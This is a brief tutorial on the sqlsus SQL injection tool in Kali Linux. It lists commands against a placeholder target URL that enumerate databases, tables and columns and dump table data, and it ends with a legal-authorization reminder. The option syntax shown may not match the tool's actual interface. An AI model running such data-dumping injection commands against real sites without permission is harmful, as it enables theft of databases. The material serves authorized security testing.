SQLSus is a MySQL injection tool available on Kali Linux, primarily designed to automate SQL injection attacks. It can retrieve information from databases, perform blind SQL injections, and exploit various MySQL vulnerabilities.
Here’s a basic guide on how to use the sqlsus command in Kali:
Installation
sudo apt install sqlsus
Basic Command Structure:
sqlsus -h <target URL> –inject <vulnerable parameter>
sqlsus -h “http://target.com/index.php?id=1”
sqlsus -h “http://target.com/index.php?id=1” –getdbs
sqlsus -h “http://target.com/index.php?id=1” –db <database_name> –gettables
sqlsus -h “http://target.com/index.php?id=1” –db <database_name> –table <table_name> –getcolumns
sqlsus -h “http://target.com/index.php?id=1” –db <database_name> –table <table_name> –dump
sqlsus -h “http://target.com/index.php?id=1” –inject ‘boolean-based’
Note: Ensure you have legal authorization before using SQL injection tools on any website or network. SQL injection attacks are illegal if performed without proper permission, as they can compromise the integrity of systems and databases.